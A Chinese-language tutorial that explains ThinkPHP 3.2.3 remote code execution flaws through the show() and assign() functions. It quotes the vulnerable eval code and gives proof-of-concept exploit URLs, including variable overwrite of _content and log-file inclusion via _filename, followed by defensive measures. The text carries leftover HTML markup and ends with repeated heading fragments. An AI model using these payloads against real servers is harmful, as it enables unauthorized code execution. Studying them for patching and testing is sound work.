ThinkPHP3 RCE漏洞分析与利用教学文档<\/h1>

一、ThinkPHP3 show函数命令执行漏洞<\/h2>

1.1 漏洞概述<\/h3>
ThinkPHP3框架中的`show<\/code>函数在特定配置下可能导致远程代码执行(RCE)漏洞。该漏洞源于模板解析过程中的不安全处理，当开启PHP原生模板时，攻击者可以注入恶意代码。<\/p>`

1.2 漏洞环境<\/h3>
<?<\/span>php<\/span> 
<\/span><\/span>namespace<\/span> Home\Controller<\/span>;
<\/span><\/span>use<\/span> Think\Controller<\/span>;
<\/span><\/span>
<\/span><\/span>class<\/span> IndexController<\/span> extends<\/span> Controller<\/span> {
<\/span><\/span>    public<\/span> function<\/span> index<\/span>($n =<\/span> ''<\/span>){
<\/span><\/span>        $this-><\/span>show<\/span>('<style type="text\/css">*{ padding: 0; margin: 0; } div{ padding: 4px 48px;} body{ background: #fff; font-family: "微软雅黑"; color: #333;font-size:24px} h1{ font-size: 100px; font-weight: normal; margin-bottom: 12px; } p{ line-height: 1.8em; font-size: 36px } a,a:hover{color:blue;}<\/style><div style="padding: 14px 28px;"> <h2>Thinkphp3.2.3 show函数命令执行<\/h2><p>注入点:'<\/span> .<\/span> $n .<\/span> '<\/p>'<\/span>, 'utf-8'<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>1.3 漏洞分析<\/h3>


调用链<\/strong>：show()<\/code> → fetch()<\/code><\/p>
<\/li>

关键函数fetch<\/code>分析<\/strong>：<\/p>
<\/li>
<\/ol>
public<\/span> function<\/span> fetch<\/span>($templateFile=<\/span>''<\/span>,$content=<\/span>''<\/span>,$prefix=<\/span>''<\/span>) {
<\/span><\/span>    if<\/span>(empty<\/span>($content)) {
<\/span><\/span>        $templateFile =<\/span> $this-><\/span>parseTemplate<\/span>($templateFile);
<\/span><\/span>        if<\/span>(!<\/span>is_file<\/span>($templateFile)) E<\/span>(L<\/span>('_TEMPLATE_NOT_EXIST_'<\/span>).<\/span>':'<\/span>.<\/span>$templateFile);
<\/span><\/span>    }else<\/span>{
<\/span><\/span>        defined<\/span>('THEME_PATH'<\/span>) or<\/span> define<\/span>('THEME_PATH'<\/span>, $this-><\/span>getThemePath<\/span>());
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    ob_start<\/span>();
<\/span><\/span>    ob_implicit_flush<\/span>(0<\/span>);
<\/span><\/span>    
<\/span><\/span>    if<\/span>('php'<\/span> ==<\/span> strtolower<\/span>(C<\/span>('TMPL_ENGINE_TYPE'<\/span>))) { \/\/ 使用PHP原生模板
<\/span><\/span><\/span><\/span>        $_content =<\/span> $content;
<\/span><\/span>        extract<\/span>($this-><\/span>tVar<\/span>, EXTR_OVERWRITE<\/span>);
<\/span><\/span>        empty<\/span>($_content)?<\/span>include<\/span> $templateFile:<\/span>eval<\/span>('?>'<\/span>.<\/span>$_content);
<\/span><\/span>    }else<\/span>{
<\/span><\/span>        \/\/ 视图解析标签
<\/span><\/span><\/span><\/span>        $params =<\/span> array<\/span>('var'<\/span>=><\/span>$this-><\/span>tVar<\/span>,'file'<\/span>=><\/span>$templateFile,'content'<\/span>=><\/span>$content,'prefix'<\/span>=><\/span>$prefix);
<\/span><\/span>        Hook<\/span>::<\/span>listen<\/span>('view_parse'<\/span>,$params);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    $content =<\/span> ob_get_clean<\/span>();
<\/span><\/span>    Hook<\/span>::<\/span>listen<\/span>('view_filter'<\/span>,$content);
<\/span><\/span>    return<\/span> $content;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>

漏洞触发条件<\/strong>：<\/p>

配置TMPL_ENGINE_TYPE<\/code>为'php'（使用PHP原生模板）<\/li>
用户输入直接传入show<\/code>函数<\/li>
<\/ul>
<\/li>

漏洞原理<\/strong>：<\/p>

当使用PHP原生模板时，$_content<\/code>会被直接通过eval('?>'.$_content)<\/code>执行<\/li>
攻击者可以控制$_content<\/code>内容，导致任意代码执行<\/li>
<\/ul>
<\/li>
<\/ol>
1.4 漏洞利用<\/h3>
直接构造恶意输入即可实现RCE：<\/p>
http:\/\/target.com\/index.php?n=<?php phpinfo();?>
<\/code><\/pre>
二、assign变量覆盖导致RCE<\/h2>
2.1 第一种情况：两个参数可控<\/h3>
漏洞代码<\/h4>
public<\/span> function<\/span> index<\/span>(){
<\/span><\/span>    $a=<\/span>$_GET[name<\/span>];
<\/span><\/span>    $b=<\/span>$_GET[from<\/span>];
<\/span><\/span>    $this-><\/span>assign<\/span>($a,$b);
<\/span><\/span>    $this-><\/span>display<\/span>('index'<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞分析<\/h4>

assign<\/code>函数用于向模板分配变量<\/li>
当两个参数都可控时，可以覆盖$_content<\/code>变量<\/li>
在后续模板渲染时，被覆盖的$_content<\/code>会被执行<\/li>
<\/ol>
漏洞利用<\/h4>
Payload:<\/p>
http:\/\/127.0.0.1\/?name=_content&from=%3C?php%20phpinfo()?%3E
<\/code><\/pre>
2.2 第二种情况：第一个变量可控（日志包含）<\/h3>
漏洞代码<\/h4>
public<\/span> function<\/span> index<\/span>(){
<\/span><\/span>    $this-><\/span>assign<\/span>($_GET['name'<\/span>]);
<\/span><\/span>    $this-><\/span>display<\/span>('index'<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞分析<\/h4>

当只有第一个参数可控时，可以覆盖_filename<\/code>变量<\/li>
通过包含日志文件实现RCE<\/li>
注意：直接浏览器输入会被URL编码，需使用Burp等工具绕过<\/li>
<\/ol>
日志文件路径<\/h4>
.\/Application\/Runtime\/Logs\/Home\/22_01_14.log
<\/code><\/pre>
漏洞利用<\/h4>
Payload:<\/p>
http:\/\/127.0.0.1\/?name[_filename]=.\/Application\/Runtime\/Logs\/Home\/22_01_14.log
<\/code><\/pre>
2.3 调用链分析<\/h3>
index → display → fetch → listen
<\/code><\/pre>
三、防御措施<\/h2>


输入过滤<\/strong>：<\/p>

对所有用户输入进行严格过滤<\/li>
避免直接将用户输入传递给show<\/code>或assign<\/code>函数<\/li>
<\/ul>
<\/li>

配置安全<\/strong>：<\/p>

避免使用PHP原生模板（TMPL_ENGINE_TYPE<\/code>不要设置为'php'）<\/li>
使用官方推荐的模板引擎<\/li>
<\/ul>
<\/li>

权限控制<\/strong>：<\/p>

限制日志目录的访问权限<\/li>
避免日志记录敏感信息<\/li>
<\/ul>
<\/li>

框架升级<\/strong>：<\/p>

升级到最新版本的ThinkPHP<\/li>
应用官方安全补丁<\/li>
<\/ul>
<\/li>
<\/ol>
四、总结<\/h2>
ThinkPHP3中存在多种RCE漏洞利用方式，主要涉及：<\/p>

show<\/code>函数在特定配置下的代码执行<\/li>
assign<\/code>函数导致的变量覆盖

直接覆盖_content<\/code>变量<\/li>
通过日志文件包含实现RCE<\/li>
<\/ul>
<\/li>
<\/ol>
理解这些漏洞的原理和利用方式，有助于开发人员编写更安全的代码和安全人员更好地进行安全测试。<\/p>

ThinkPHP3 RCE漏洞分析与利用教学文档<\/h1>

一、ThinkPHP3 show函数命令执行漏洞<\/h2>

1.1 漏洞概述<\/h3> ThinkPHP3框架中的show<\/code>函数在特定配置下可能导致远程代码执行(RCE)漏洞。该漏洞源于模板解析过程中的不安全处理，当开启PHP原生模板时，攻击者可以注入恶意代码。<\/p>

二、assign变量覆盖导致RCE<\/h2>

2.1 第一种情况：两个参数可控<\/h3>

2.2 第二种情况：第一个变量可控（日志包含）<\/h3>

1.1 漏洞概述<\/h3>
ThinkPHP3框架中的`show<\/code>函数在特定配置下可能导致远程代码执行(RCE)漏洞。该漏洞源于模板解析过程中的不安全处理，当开启PHP原生模板时，攻击者可以注入恶意代码。<\/p>`